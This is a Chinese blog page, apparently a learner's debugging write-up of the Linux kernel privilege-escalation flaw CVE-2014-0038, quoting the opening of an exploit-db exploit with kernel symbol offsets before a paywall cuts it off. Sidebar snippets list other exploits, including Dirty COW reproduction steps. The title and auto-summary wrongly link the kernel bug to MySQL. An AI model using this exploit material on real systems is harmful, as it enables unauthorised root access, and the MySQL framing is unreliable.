mysql udp提权_[原创]linux root 提权漏洞CVE-2014-0038调试

最新推荐文章于 2021-02-27 00:17:20 发布
最新推荐文章于 2021-02-27 00:17:20 发布
阅读量559 收藏
点赞数
文章标签: mysql udp提权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33681561/article/details/113911281
版权
本文详细介绍了Linux内核漏洞CVE-2014-0038的调试过程,该漏洞允许通过mysql udp提权。文章通过分析函数`__sys_recvmmsg`,展示了如何利用该漏洞修改内核函数指针,执行提权代码。作者通过编写并调试exploit代码,展示了如何触发和利用此漏洞,包括设置断点、修改内存地址以及触发提权代码的执行流程。
摘要由CSDN通过智能技术生成

背景

之前一直觉得root很神秘,这次尝试调试一下。对于我这样的菜鸟来说,刚开始还是调试一下比较老的洞吧,找啊找啊找漏洞,找到了CVE-2014-0038,因为看了几篇分析的文章发现大概能看懂(苦笑~能看懂真的不容易)

出现问题的函数是下面这个函数:int __sys_recvmmsg(int fd, struct mmsghdr __user *mmsg, unsigned int vlen,unsigned int flags, struct timespec *timeout

这个函数直接接收用户态传入的timeout指针,并且根据一定的条件可以修改timeout指向变量的值.这就造成了内核任意地址写的漏洞。如果利用这个漏洞修改某个内核函数指针,让它指向用户态的地址,在用户态的地址放上提权代码,这样等下次调用这个函数的时候,就可以以内核的模式来执行提权代码。

根据exploit-db的代码运行一下:

128a92d9ca95408718d49a52604f8d1c.png

接着试着调试一下这个exploit,调试linux内核,用的是kgdb+vmware+com。(虽然网上有不少设置的教程但还是遇到不少坑)#define _GNU_SOURCE

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#include 

#define __X32_SYSCALL_BIT 0x40000000

#undef __NR_recvmmsg

#define __NR_recvmmsg (__X32_SYSCALL_BIT + 537)

#define VLEN 1

#define BUFSIZE 200

int port;

struct offset {

char *kernel_version;

unsigned long dest; // net_sysctl_root + 96

unsigned long original_value; // net_ctl_permissions

unsigned long prepare_kernel_cred;

unsigned long commit_creds;

};

struct offset offsets[] = {

{"3.8.0-19-generic",0xffffffff81cc7940,0xffffffff816a7f40,0xffffffff810847c0, 0xffffffff81084500}, // Ubuntu 13.04

{NULL,0,0,0,0}

};

void udp(int b) {

int sockfd;

struct sockaddr_in servaddr,cliaddr;

int s = 0xff+1;

if(fork() == 0) {

while(s > 0) {

fprintf(stderr,"\rbyte %d / 3.. ~%d secs left   

最低0.47元/天 解锁文章
李赔十学长
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CVE-2014-0038内核漏洞原理与本地提权利用代码实现分析
weixin_33814685的博客
03-08 1738
seteuid0 · 2014/11/07 16:08关键字:CVE-2014-0038,内核漏洞,POC,利用代码,本地提权提权,exploit,cve analysis, privilege escalation, cve, kernel vulnerability简介2014年1月31号时,solar在oss-sec邮件列表里公布了该CVEcve-2014-0038)。这个CVE涉及到X...
mysql udp服务器_netty学习:UDP服务器与Spring整合(2)
weixin_35676877的博客
01-20 144
上一篇文章中,介绍了netty实现UDP服务器的栗子。本文将会对UDP服务器与spring boot整合起来,并使用RedisTemplate的操作类访问Redis和使用Spring DATA JPA链接MySQL数据库,其中会使用多线程、异步等知识。只公布了一个框架,需要的同学可以根据此来进行扩展,增加自己需要的功能模块。如Controller部分。本人使用的编辑器是IntelliJ IDEA ...
CVE-2014-0038分析
Bill
09-01 886
CVE-2014-0038分析 引言     这是决定不打比赛之后的第一个CVE分析, 感觉还行, 就是其中个别问题没有弄清楚, 基本流程清楚了, 最后我会提出我的问题, 有哪位大佬能回答的, 直接在下面留言就行了. 漏洞点 原因     没有对用户空间的输入信息进行拷贝处理, 直接将用...
udp提权
Hydra的博客
11-10 922
1.udf是什么    udf = 'user defined function',即用户自定义函数。是通过添加新函数,对mysql的功能进行扩充,性质就像使用本地mysql函数如abs()或concat()。 2.如何使用 假设我的udf文件名为‘udf.so’,存放在Mysql根目录(通过select @@basedir可知)的‘usr/’目录下。 如果使用一个未定义的函数(sys...
mysql udp服务器_UDP服务器
weixin_34677379的博客
01-20 250
传输层主要应用的协议模型有两种,一种是TCP协议,另外一种则是UDP协议。TCP协议在网络通信中占主导地位,绝大多数的网络通信借助TCP协议完成数据传输。但UDP也是网络通信中不可或缺的重要通信手段。相较于TCP而言,UDP通信的形式更像是发短信。不需要在数据传输之前建立、维护连接。只专心获取数据就好。省去了三次握手的过程,通信速度可以大大提高,但与之伴随的通信的稳定性和正确率便得不到保证。因此,...
CVE-2014-4113-exp.zip_CVE-2014-4113_cve_cve-2014-4113提权
09-24
CVE-2014-4113提权漏洞利用代码,国外大牛将最初只能在win7上使用的代码扩展到了win8上可用。python开发~
IIS "IP and domain restrictions" 绕过漏洞(CVE-2014-4078)
02-09
【该漏洞通过版本比较方式检测,结果可能不准确,需要根据实际情况确认。】Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。 "IP and domain restrictions" ...
CVE-2016-8655 Linux内核提权漏洞POC
11-18
CVE-2016-8655 Linux内核提权漏洞POC
CVE-2018-8120 Microsoft Windows提权漏洞 Exp_64
06-10
CVE-2018-8120 Microsoft Windows提权漏洞 Exp_32 该资源适用于64位windows操作系统
新版脏牛Linux内核提权漏洞CVE-2022-0847
03-09
5.8 <= Linux kernel 中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 修复版本:Linux 5.16.11、5.15.25 和 5.10.102 中修复。
mysql连接 udp_UDP连接对象原理解析及使用实例
weixin_35949431的博客
01-28 468
之前写了一个简单的UDP服务端和客户端示例,用于入门UDP,当我实际使用时发生了一点问题!上次使用中我也把连接对象 DatagramSocket 写成了静态的,在类的初始化时使用,可是系统中有很多地方使用,难道我要不断的创建这个类的对象吗?可以这么做,当时有后果,后果就是内存溢出。UDP是没有状态的,DatagramSocket 创建一次即可,就是开始指向某个地址的端口,而不用每次创建。由于UDP...
mysql 监听 udp_通用TCP、UDP服务监控脚本
weixin_35924166的博客
02-07 215
技术原理:本次服务监控采用较为简洁且通用的方法,主要是利用了nmap的扫描技术。针对TCP服务,采用半开扫描技术来探测指定的TCP端口是否可达;针对UDP服务,仅采用普通UDP端口扫描技术来探测指定的UDP端口是否可达。以此来判断相应的服务是否正常。相关工具:# yum -y install nmap监控脚本:#!/bin/sh#==================================...
udp发送的数据存入MySQL_使用UDP实现数据的发送和接收
weixin_36311421的博客
01-20 867
1.UDP是无连接到不可靠的一种传输方式,只负责发送而不管接收方是否接收到,所以效率也高一点(牺牲安全追求效率案例)2.实现发送和接收的具体实现//客户端类public class Client{//先抛异常,抓重点public static void main (String []args)throws Exception{//建立发送端DatagramSocket client=nwe Dat...
vs用udp传数据给mysql_网络中的数据(传输篇)UDP协议 TCP协议
weixin_39847437的博客
02-04 182
**TCP协议**TCP:Transmission Control Protocol 传输控制协议主要作用:把数据流分割成适当长度的报文段之后进行传输工作机制:紧小细微型。面向连接意味着两个使用TCP的应用(通常是一个客户和一个服务器)在彼此交换数据包之前必须先建立一个TCP连接。这一过程与打电话很相似,先拨号振铃,等待对方摘机说“喂”,然后才说明是谁。在一个TCP连接中,仅有两方进行彼此通信。而...
mysql udp提权_SQL Server数据库1433端口解封提权
weixin_29830833的博客
02-17 783
众所周知,1433端口是SQL Server默认的端口,SQL Server服务使用两个端口:TCP-1433、UDP-1434。其中1433用于供SQL Server对外提供服务,1434用于向请求者返回SQL Server使用了哪个TCP/IP端口。可以利用sa的弱口令,可以通过1433端口进行入侵和提权。为什么要解封?因为数据库管理员为了安全起见,之前对某些敏感文件的权限降低,所以就需要解封...
UDP网络编程实战:基于MYSQL数据库的聊天服务器的搭建
qq_37358422的博客
07-26 727
  新手上路,自己学得一知半解,按照自己的理解,码了一个基于UDP的聊天服务器,后续会写与其配套的客户端。   此服务器,主要有以下几点的功能:   1.登录功能   2.注册功能   3.查询功能   4.退出功能   其具体介绍如下:   1.登录功能      传输数据格式:char recvBuf[100]      客户端向服务器传输时格式为:      当首位rec...
mysql udp提权_webshell已经拿到,下一步这么提权
weixin_39645306的博客
02-07 133
主机是windows2000ProtoLocalAddressForeignAddressStateTCP0.0.0.0:210.0.0.0:0LISTENINGTCP0.0.0.0:220.0.0.0:0LISTENINGTCP0.0.0.0:800.0.0.0:0LISTENINGTCP0.0.0.0:810.0.0.0:0LI...主机是windows 2000Proto Local Ad...
cve-2014-9295复现
Yale的博客
04-02 707
Cve-2014-9295 背景: 在4.2.8之前,NTP中的ntpd中有多个基于堆栈的缓冲区溢出,允许远程攻击者通过一个经过设计的包执行任意代码,这与(1)使用自动密钥身份验证功能时的crypto recv函数、(2)ctl putdata函数和(3)configure函数有关 复现: 启动服务 执行exp: 服务已经崩溃了 ...
mysql udp提权_GitHub - vnhacker1337/linux-kernel-exploits: linux-kernel-exploits Linux平台提权漏洞集合...
weixin_30583711的博客
02-27 72
CVE-2017-1000367  [Sudo](Sudo 1.8.6p7 - 1.8.20)CVE-2017-7494  [Samba Remote execution](Samba 3.5.0-4.6.4/4.5.10/4.4.14)CVE-2016-5195  [Dirty cow](Linux kernel>2.6.22 (released in 2007))CVE-2016-072...
Linux提权一脏牛漏洞(CVE-2016-5195)复现
最新发布
07-28
你好!对于Linux提权的脏牛漏洞CVE-2016-5195),我可以为你提供一些复现的步骤。请注意,这是一个严重的安全漏洞,仅用于测试和教育目的。 在开始之前,请确保你已经备份了你的系统和数据,因为这个过程可能会对系统造成损坏。 以下是复现脏牛漏洞的一般步骤: 1. 确认你的系统受到脏牛漏洞的影响。你可以使用以下命令检查: ```shell $ uname -r ``` 如果输出的内核版本在`3.0`到`4.7`之间(不包括两端),那么你的系统可能受到影响。 2. 下载并编译脏牛漏洞的测试程序,可以使用以下命令: ```shell $ git clone https://github.com/dirtycow/dirtycow.github.io $ cd dirtycow.github.io $ make ``` 3. 运行测试程序进行提权。请注意,这可能会对系统造成损坏,所以请谨慎操作。 ```shell $ ./test_dirtycow your_file_name ``` `your_file_name`是你想要修改的目标文件的路径。这个测试程序会尝试修改目标文件的权限,以实现提权效果。 4. 检查提权是否成功。你可以尝试运行一个需要超级用户权限的命令来验证。 ```shell $ sudo whoami ``` 如果输出结果为"root",那么你已经成功提权了。 请记住,在测试和复现漏洞时,务必遵守法律和道德准则。此外,确保你在合法的环境下进行测试,并获得了合适的授权。 希望这些步骤能帮助到你!如果你有任何其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值